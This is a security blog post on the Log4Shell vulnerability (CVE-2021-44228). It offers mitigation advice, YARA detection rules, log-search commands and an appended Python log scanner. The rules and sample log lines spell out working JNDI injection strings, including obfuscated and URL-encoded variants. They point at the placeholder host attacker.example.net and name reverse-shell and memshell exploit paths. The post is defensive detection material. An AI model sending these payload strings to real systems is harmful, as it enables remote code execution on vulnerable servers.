
Log4Shell YARA IOC

Posted Under: IOCs, Log4j, PowerShell, Shell, Snort, Tutorials, YARA on Dec 11, 2021
Log4Shell is a Remote Code Execution (RCE) vulnerability (CVE-2021-44228) in Apache Log4j, one of the most widely used enterprise logging libraries. It affects Apache Log4j versions 2.0 through 2.14.1. Apache has released an emergency patch to address the issue. The best mitigation against this vulnerability is to patch Log4j to 2.15.0 or above; in Log4j versions >= 2.10 the behavior can be mitigated by setting the system property log4j2.formatMsgNoLookups to true or by removing the JndiLookup class from the classpath. Additionally, if the server has a Java runtime >= 8u121, then by default the settings com.sun.jndi.rmi.object.trustURLCodebase and com.sun.jndi.cosnaming.object.trustURLCodebase are set to false, mitigating this risk. However, enabling these system properties requires access to the vulnerable servers as well as a restart.

Download the Log4j Log4Shell Vulnerability Scanner to detect vulnerable hosts.

In the meantime, YARA rules can be deployed at the IDS/IPS level to mitigate it.

Log4Shell YARA Rules

rule EXPL_Log4j_CVE_2021_44228_JAVA_Exception_Dec21_1 {
   meta:
      description = "Detects exceptions found in server logs that indicate an exploitation attempt of CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b"
      date = "2021-12-12"
      score = 60
   strings:
      $xa1 = "header with value of BadAttributeValueException: "
      
      $sa1 = ".log4j.core.net.JndiManager.lookup(JndiManager"
      $sa2 = "Error looking up JNDI resource"
   condition:
      $xa1 or all of ($sa*)
}

rule EXPL_Log4j_CVE_2021_44228_Dec21_Soft {
   meta:
      description = "Detects indicators in server logs that indicate an exploitation attempt of CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
      date = "2021-12-10"
      modified = "2021-12-12"
      score = 60
   strings:
      $x1 = "${jndi:ldap:/"
      $x2 = "${jndi:rmi:/"
      $x3 = "${jndi:ldaps:/"
      $x4 = "${jndi:dns:/"
      $x5 = "${jndi:iiop:/"
      $x6 = "${jndi:http:/"
      $x7 = "${jndi:nis:/"
   condition:
      1 of them
}

rule EXPL_Log4j_CVE_2021_44228_Dec21_OBFUSC {
   meta:
      description = "Detects obfuscated indicators in server logs that indicate an exploitation attempt of CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
      date = "2021-12-12"
      score = 60
   strings:
      $x1 = "$%7Bjndi:"
      $x2 = "%2524%257Bjndi"
      $x3 = "%2F%252524%25257Bjndi%3A"
      $x4 = "${jndi:${lower:"
      $x5 = "${::-j}${"
   condition:
      1 of them
}

rule EXPL_Log4j_CVE_2021_44228_Dec21_Hard {
   meta:
      description = "Detects indicators in server logs that indicate the exploitation of CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/h113sdx/status/1469010902183661568?s=20"
      date = "2021-12-10"
      modified = "2021-12-12"
      score = 80
   strings:
      $x1 = /\$\{jndi:(ldap|ldaps|rmi|dns|iiop|http|nis):\/[\/]?[a-z-\.0-9]{3,120}:[0-9]{2,5}\/[a-zA-Z\.]{1,32}\}/
      $fp1r = /(ldap|rmi|ldaps|dns):\/[\/]?(127\.0\.0\.1|192\.168\.|172\.[1-3][0-9]\.|10\.)/
   condition:
      $x1 and not 1 of ($fp*)
}

rule SUSP_Base64_Encoded_Exploit_Indicators_Dec21 {
   meta:
      description = "Detects base64 encoded strings found in payloads of exploits against log4j CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/Reelix/status/1469327487243071493"
      date = "2021-12-10"
      score = 70
   strings:
      /* curl -s  */
      $sa1 = "Y3VybCAtcy"
      $sa2 = "N1cmwgLXMg"
      $sa3 = "jdXJsIC1zI"
      /* |wget -q -O-  */
      $sb1 = "fHdnZXQgLXEgLU8tI"
      $sb2 = "x3Z2V0IC1xIC1PLS"
      $sb3 = "8d2dldCAtcSAtTy0g"
   condition:
      1 of ($sa*) and 1 of ($sb*)
}

rule SUSP_JDNIExploit_Indicators_Dec21 {
   meta:
      description = "Detects indicators of JDNI usage in log files and other payloads"
      author = "Florian Roth"
      reference = "https://github.com/flypig5211/JNDIExploit"
      date = "2021-12-10"
      modified = "2021-12-12"
      score = 70
   strings:
      $xr1 = /(ldap|ldaps|rmi|dns|iiop|http|nis):\/\/[a-zA-Z0-9\.]{7,80}:[0-9]{2,5}\/(Basic\/Command\/Base64|Basic\/ReverseShell|Basic\/TomcatMemshell|Basic\/JBossMemshell|Basic\/WebsphereMemshell|Basic\/SpringMemshell|Basic\/Command|Deserialization\/CommonsCollectionsK|Deserialization\/CommonsBeanutils|Deserialization\/Jre8u20\/TomcatMemshell|Deserialization\/CVE_2020_2555\/WeblogicMemshell|TomcatBypass|GroovyBypass|WebsphereBypass)\//
   condition:
      filesize < 100MB and $xr1
}

rule SUSP_EXPL_OBFUSC_Dec21_1{
   meta:
      description = "Detects obfuscation methods used to evade detection in log4j exploitation attempt of CVE-2021-44228"
      author = "Florian Roth"
      reference = "https://twitter.com/testanull/status/1469549425521348609"
      date = "2021-12-11"
      score = 60
   strings:
      /* ${lower:X} - single character match */
      $ = { 24 7B 6C 6F 77 65 72 3A ?? 7D }
      /* ${upper:X} - single character match */
      $ = { 24 7B 75 70 70 65 72 3A ?? 7D }
      /* URL encoded lower - obfuscation in URL */
      $ = "$%7blower:"
      $ = "$%7bupper:"
      $ = "%24%7bjndi:"
      $ = "$%7Blower:"
      $ = "$%7Bupper:"
      $ = "%24%7Bjndi:"
   condition:
      1 of them
}

Download Log4Shell YARA Rules

Download all YARA rules for the Log4Shell exploit.

Log4Shell Snort Rules

Snort and Suricata prevention rules to mitigate the Log4Shell threat.

Log4Shell Detection in Log Files

If you want to investigate exploitation attempts in logs, try these commands. This command searches for exploitation attempts in uncompressed files in the folder /var/log and all its subfolders:
sudo egrep -i -r '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+' /var/log
This command searches for exploitation attempts in compressed files in the folder /var/log and all its subfolders:
sudo find /var/log -name \*.gz -print0 | xargs -0 zgrep -E -i '\$\{jndi:(ldap[s]?|rmi|dns):/[^\n]+'
To find JAR files that contain the JndiLookup class (the vulnerable component) on a Windows-based system, run this command in PowerShell:
gci 'C:\' -rec -force -include *.jar -ea 0 | foreach {select-string "JndiLookup.class" $_} | select -exp Path
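The same detection logic in a form that can be run offline over log lines: an added Python example (not from the page or the rules' author) that applies the Hard rule's JNDI URL regex and its private-address exclusion after undoing the URL encoding and the ${lower:}/${::-} tricks the OBFUSC rules list. The access-log lines and the host attacker.example.net are constructed for the example.

```python
import re
from urllib.parse import unquote

# Mirrors the page's EXPL_Log4j_CVE_2021_44228_Dec21_Hard rule: $x1 is the JNDI URL
# pattern, $fp1r the private-address false-positive filter.
JNDI_URL = re.compile(
    r"\$\{jndi:(ldap|ldaps|rmi|dns|iiop|http|nis):/[/]?"
    r"[a-z\-.0-9]{3,120}:[0-9]{2,5}/[a-zA-Z.]{1,32}\}",
    re.IGNORECASE,
)
PRIVATE_TARGET = re.compile(
    r"(ldap|rmi|ldaps|dns):/[/]?(127\.0\.0\.1|192\.168\.|172\.[1-3][0-9]\.|10\.)"
)
# Obfuscations listed in the OBFUSC rules: ${lower:j}, ${upper:J} and ${::-j}
LOOKUP_CHAR = re.compile(r"\$\{(?:lower|upper):(.)\}", re.IGNORECASE)
DEFAULT_VALUE = re.compile(r"\$\{[^{}]*?:-(.)\}")

def normalize(line: str) -> str:
    """Undo URL encoding (also double encoding) and single-character lookups."""
    prev = None
    while prev != line:  # %2524%257B -> %24%7B -> ${
        prev, line = line, unquote(line)
    prev = None
    while prev != line:  # resolve nested lookups from the inside out
        prev = line
        line = LOOKUP_CHAR.sub(lambda m: m.group(1), line)
        line = DEFAULT_VALUE.sub(lambda m: m.group(1), line)
    return line

def classify(line: str) -> str:
    """'exploit', 'private-target' (the Hard rule's $fp exclusion) or 'clean'."""
    norm = normalize(line)
    if not JNDI_URL.search(norm):
        return "clean"
    if PRIVATE_TARGET.search(norm):
        return "private-target"
    return "exploit"

def scan(lines):
    """(line_number, verdict) for every line that is not clean."""
    return [(n, v) for n, l in enumerate(lines, 1) if (v := classify(l)) != "clean"]

# Constructed access-log lines, not real traffic; attacker.example.net is a placeholder.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Dec/2021:10:00:01] "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.5 - - [11/Dec/2021:10:00:02] "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example.net:1389/a}"',
    '10.0.0.5 - - [11/Dec/2021:10:00:03] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example.net%3A1389%2Fa%7D HTTP/1.1" 400',
    '10.0.0.5 - - [11/Dec/2021:10:00:04] "GET / HTTP/1.1" 200 "${${::-j}ndi:${lower:l}dap://attacker.example.net:1389/a}"',
    '10.0.0.5 - - [11/Dec/2021:10:00:05] "GET / HTTP/1.1" 200 "${jndi:ldap://127.0.0.1:1389/a}"',
]
```

Unlike the grep one-liners above, the normalization step also catches the double-encoded and ${lower:}-split variants that a literal "${jndi:" search misses.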